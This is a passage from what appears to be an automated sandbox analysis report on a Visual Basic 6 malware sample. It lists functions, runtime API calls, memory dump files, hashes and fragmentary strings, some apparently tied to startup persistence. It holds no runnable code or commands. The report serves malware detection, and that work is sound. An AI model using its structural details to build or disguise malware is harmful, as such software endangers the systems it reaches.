                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                              • Part of subcall function 0040EAB0: #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004114BD
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004114C5
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004114CE
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004114E2
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004114ED
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 004114F0
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 004114F9
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041150F
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00411518
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041151D
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00411520
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00411529
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00411572), ref: 00411560
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00411565
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041156A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041156F
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00411589
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$File$Copy$#516#631BstrClosePut3$#525#570Get3$#598#648ErrorExitListOpenProcSeek$#537#594Overflow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 936154001-0
                                                                                                                                                            • Opcode ID: 7388e1bd2b66fa6b056741b4791ef962c4142c5a93219274217dbce0ffb5ad99
                                                                                                                                                            • Instruction ID: ff6c34d3fed2378173252cfce728cf62963b49a80d3fcd64e048a008bc34630c
                                                                                                                                                            • Opcode Fuzzy Hash: 7388e1bd2b66fa6b056741b4791ef962c4142c5a93219274217dbce0ffb5ad99
                                                                                                                                                            • Instruction Fuzzy Hash: F6B12D71D00218AFDB04DFE4DE88AEE7BB9FB88311F10452AE616E72A0DB745945CF58
                                                                                                                                                            Function 0040480F Relevance: 89.6, APIs: 47, Strings: 4, Instructions: 334COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0040BF4E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 0040BF95
                                                                                                                                                              • Part of subcall function 00418B50: __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                              • Part of subcall function 00418B50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,00000000,80000002,00000000,Start,00000004,80000002,00000000,Start,00000002,80000001,00000000,00000000,00000000), ref: 0040C00B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040C016
                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,?,00000000,004025E6), ref: 0040C030
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040C03B
                                                                                                                                                              • Part of subcall function 00418C90: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                              • Part of subcall function 00418C90: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                              • Part of subcall function 00418C90: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,00000000,004025E6), ref: 0040C056
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,00000000,?,00000000,004025E6), ref: 0040C072
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 0040C07D
                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,00000000,004025E6), ref: 0040C096
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 0040C0A1
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,00000000,004025E6), ref: 0040C0BC
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,0040563C), ref: 0040C0D3
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C0DE
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040C111
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C12C
                                                                                                                                                            • __vbaNew.MSVBVM60(0040564C), ref: 0040C13E
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C149
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040C17C
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C197
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040C1C2
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000000,00000001), ref: 0040C1D6
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040C1EB
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000001,00000000), ref: 0040C1F4
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040C214
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040C238
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040C252
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040C259
                                                                                                                                                            • #529.MSVBVM60(00000008), ref: 0040C26D
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C27D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Error$CopyMove$System$AnsiListUnicode$Chkstk$CheckHresult$#529BstrCast
                                                                                                                                                            • String ID: RO$C$Once$Start
                                                                                                                                                            • API String ID: 3306888832-2962527757
                                                                                                                                                            • Opcode ID: 38f2c482234380c5ccf5e47192bcb562df34f22c8bdb2e96fe65b30f76930fc4
                                                                                                                                                            • Instruction ID: 2a7bed8e637f556c1a294a0d9af7fafa12270aafcab1a65859bb43c9b5deaf43
                                                                                                                                                            • Opcode Fuzzy Hash: 38f2c482234380c5ccf5e47192bcb562df34f22c8bdb2e96fe65b30f76930fc4
                                                                                                                                                            • Instruction Fuzzy Hash: 24D1DC75900208EFDB04DFE4DD89BDE7BB9FB48305F108529F606B61A0DB745A45CBA8
                                                                                                                                                            Function 0040AE40 Relevance: 80.8, APIs: 43, Strings: 3, Instructions: 347COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040AE5E
                                                                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,?,004025E6), ref: 0040AEA7
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AEB6
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,004025E6), ref: 0040AECE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,004025E6), ref: 0040AEF4
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0040AF1D
                                                                                                                                                              • Part of subcall function 00418B50: __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                              • Part of subcall function 00418B50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,?,004025E6), ref: 0040AF5A
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 0040AF94
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0040AFAA
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 0040AFC3
                                                                                                                                                            • #525.MSVBVM60(00000104), ref: 0040AFEC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040AFF7
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0040B02E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040B06D
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 0040B088
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0040B0AE
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0040B0BF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0040B0D4
                                                                                                                                                            • #616.MSVBVM60(?,?), ref: 0040B0E9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040B0F7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 0040B111
                                                                                                                                                            • #517.MSVBVM60(00000000), ref: 0040B118
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040B123
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040B139
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,?,004025E6), ref: 0040B14D
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000,?,?,?,004025E6), ref: 0040B17F
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000,?,?,?,004025E6), ref: 0040B1BD
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,?,?,?,004025E6), ref: 0040B204
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,004025E6), ref: 0040B21A
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,?,?,?,?,004025E6), ref: 0040B233
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 0040B257
                                                                                                                                                            • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 0040B2DB
                                                                                                                                                            • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040B2F3
                                                                                                                                                            • #600.MSVBVM60(00000008,00000000), ref: 0040B312
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040B324
                                                                                                                                                            • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 0040B399
                                                                                                                                                            • __vbaStrCat.MSVBVM60( PR,00000000,00000000), ref: 0040B3B2
                                                                                                                                                            • #600.MSVBVM60(00000008,00000000), ref: 0040B3D1
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040B3E3
                                                                                                                                                              • Part of subcall function 00410560: __vbaChkstk.MSVBVM60(?,004025E6,?,?,?,?,?,?,?,?,004025E6), ref: 0041057E
                                                                                                                                                              • Part of subcall function 00410560: __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 004105AE
                                                                                                                                                              • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,?,004025E6), ref: 004105E8
                                                                                                                                                              • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(00000000), ref: 00410611
                                                                                                                                                              • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(00000000), ref: 00410627
                                                                                                                                                            • #598.MSVBVM60 ref: 0040B3F0
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040B456), ref: 0040B42E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$Free$Ansi$Move$ChkstkUnicode$#580#600Copy$#517#525#598#616BoundsBstrConstruct2GenerateList
                                                                                                                                                            • String ID: PR$ SE$4
                                                                                                                                                            • API String ID: 3576955720-2816282373
                                                                                                                                                            • Opcode ID: 1de2eecb3e22f9f67d275207b9972fb08be8cc8f6e3fb6eea473884b16e18e1a
                                                                                                                                                            • Instruction ID: 549e129ae2bb91e84472ac49bce2616dd184e0a5e73778e746ab4582d66d714c
                                                                                                                                                            • Opcode Fuzzy Hash: 1de2eecb3e22f9f67d275207b9972fb08be8cc8f6e3fb6eea473884b16e18e1a
                                                                                                                                                            • Instruction Fuzzy Hash: D3F1FAB5901208EFDB14DFA0DD58BDEBBB4FB48304F1081A9E549B72A0DB785A84DF58
                                                                                                                                                            Function 00419150 Relevance: 73.9, APIs: 49, Instructions: 362COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(6CEB4F32,00000000,00000FEE), ref: 004191A8
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004191B0
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 004191B4
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 004191CC
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 004191DB
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000,?), ref: 004191F4
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(004053B8), ref: 004191FF
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 00419206
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00419217
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0041922B
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00419235
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00419245
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00419256
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 00419259
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00419277
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041928D
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004192A6
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(004053B8), ref: 004192AD
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,0041B1A0,00000000), ref: 004192F5
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 004192FE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041930B
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,0041B1A4,00000000), ref: 0041931C
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,0041B110,00000000), ref: 0041932C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00419341
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00419359
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00419368
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?), ref: 00419379
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00419384
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,00000000), ref: 00419396
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041939F
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004193C1
                                                                                                                                                            • __vbaUI1I2.MSVBVM60 ref: 004193CC
                                                                                                                                                            • __vbaUI1I2.MSVBVM60 ref: 004193F8
                                                                                                                                                            • __vbaUI1I2.MSVBVM60 ref: 00419402
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00419694
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(004196D8), ref: 004196CB
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004196D0
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004196D5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$Get3$Copy$#516#631BstrFile$#525#648ErrorOpen$#537BoundsCloseExitGenerateListProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3049632819-0
                                                                                                                                                            • Opcode ID: e3b1f2423bc377d9a5caf306efc6a375a264b61fcf0490b5b8eb9692d819d35f
                                                                                                                                                            • Instruction ID: 619ad798aab7bc499b7524e0dff90ded30000a5dd3d7a33beffa270327a53f47
                                                                                                                                                            • Opcode Fuzzy Hash: e3b1f2423bc377d9a5caf306efc6a375a264b61fcf0490b5b8eb9692d819d35f
                                                                                                                                                            • Instruction Fuzzy Hash: 44D1C472900249EFDB14EFA4DD64ADDBBB6FB48300F10812AE555A72A0DB385CC1CF68
                                                                                                                                                            Function 00415D30 Relevance: 64.8, APIs: 43, Instructions: 350COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
